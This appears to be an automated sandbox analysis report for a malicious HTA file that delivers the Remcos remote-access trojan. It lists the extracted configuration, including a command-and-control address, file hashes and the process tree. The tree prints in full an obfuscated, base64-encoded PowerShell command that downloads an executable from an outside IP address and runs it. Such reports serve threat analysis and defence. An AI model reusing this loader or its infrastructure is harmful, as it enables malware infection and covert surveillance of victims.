Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-12-2024 16:25

General

  • Target

    newthingswithgreatupdateiongivenbestthingswithme.hta

  • Size

    143KB

  • MD5

    fd6fc3abb81de5133fb2de54b937ca20

  • SHA1

    241f7fa153504078a9a9b07f966f3c4e862a9545

  • SHA256

    73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644

  • SHA512

    5c37a3432112eb422e264101706a1c9e5bb7c266f064e8618b96e7e6e185800ffdf315d02f27cc23cd07e6a854bbbe19ccb5173eff885f8c808d76d6dab86516

  • SSDEEP

    768:tlEHKFlVum2oum2QB3S5KUJDVUKhC74GVf/AyK+v6Aq1Xl7zPRDIfz9esnkoFfz7:tl

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\newthingswithgreatupdateiongivenbestthingswithme.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iumviw0b.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D81.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D80.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2828
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          PID:2452

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8D81.tmp

    Filesize

    1KB

    MD5

    cfbf1a73f9f344a92b29947c22823001

    SHA1

    67b0e360c270a1c7dcf66a3f9dff86d2e5755a36

    SHA256

    72464933b2beaf9006887fde1dd2be8e8f49f7d2e8037b6cb9c8646e408ecd97

    SHA512

    bc82fbed7360bdd441a9267ef5cbe5c8eabb156d1baed19ec5a3da119872603714c7a82574c4c3bbf8a07a2e903959ac21f0ea0f5a002acb693f30833d0f3008

  • C:\Users\Admin\AppData\Local\Temp\iumviw0b.dll

    Filesize

    3KB

    MD5

    2aff9539d8b5496867446be0a11a34cb

    SHA1

    3cc76f53f21330ad4519f64852ca1b9b0d8222b4

    SHA256

    0814f73abbfbd19d11606bffd7d626a1b22c3845b1fa4da7fb64879b003b9477

    SHA512

    38344a335bfa899a9f0d7530526b744eaa6f51bc8c8cb2abbda877e7f137a4f3188c2867cfc8b457f9ad4f03bb7785d0b39c11a2fa6c00805121f6b627ab1f55

  • C:\Users\Admin\AppData\Local\Temp\iumviw0b.pdb

    Filesize

    7KB

    MD5

    407a41d005178439a8a2de2ec3aea9f6

    SHA1

    839cf6acb8f6a63f8e118c2a6fc45b2e874245e5

    SHA256

    3d41fe5ddbc60fac9686d505d15c650557b0032cefc9327b03b27a788cd44503

    SHA512

    aa82badc314a786c03437d97d6a6aae07106bbf36e90c0051fab8d898ec43f25600348a25040f337ebcce3e57c3da0dca71c9f393eb65cb029bfeaff437ba26e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8D80.tmp

    Filesize

    652B

    MD5

    8fbc1b368c131e5ff1f2451990f26a47

    SHA1

    01554756afed2eab07c6db91758bcf2b4733e062

    SHA256

    1679bb6f4eec5e1b41a914c56098ba87d680b1ba2609f066243de398350d3ee2

    SHA512

    e8bea5db6a078b0a79123ceaa28e0c99f23e1065537450c985ea7d63a1e93aa14bf7179be1e703f6782d543f8627973275deafc2808583947936be860a651ca1

  • \??\c:\Users\Admin\AppData\Local\Temp\iumviw0b.0.cs

    Filesize

    493B

    MD5

    00df4ae943d803cb15795b1fd55ead94

    SHA1

    fc1509b646d150cc4d1c2d92cf772be4af67716b

    SHA256

    e8d13d324b35fc23a6729caa22125343bfebb09476a9334e93e8c1804ce6314a

    SHA512

    e40826e83f25a3be3fdf26c1d5a667d0eb40d53d3f0fe46f8cc395152cd1eb46b98e193fc3a3f06b6cefadbed030d2a90a5575c1d235228d53d5f152d2e85796

  • \??\c:\Users\Admin\AppData\Local\Temp\iumviw0b.cmdline

    Filesize

    309B

    MD5

    b9e3642d722cc8e7c53eb586d85ae917

    SHA1

    dd360fb19d03823012ccb02f3b9c47e73fd67615

    SHA256

    4a95fb947c304436645f5e1d0dbd24de06faeba95624649dc1341b0aea45cca6

    SHA512

    3065ce2e013087d64ef3852f95fb2bb511b8472f903bb943ff752e3658360b6ddbc496d2dcfee9135d465317e58dbedbf262a8f7191089f7b305d3c31e9a980a

  • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

    Filesize

    528KB

    MD5

    a2d03c5333bfecca62720cd6ee3a4dc4

    SHA1

    ce4c380f2748f375904c17b38d4f93e294fef4f6

    SHA256

    ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

    SHA512

    5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

  • memory/2452-44-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-48-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-43-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-41-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-45-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-46-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-47-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-42-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-49-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-50-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-51-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-52-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-53-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB

  • memory/2452-54-0x0000000000400000-0x000000000048B000-memory.dmp

    Filesize

    556KB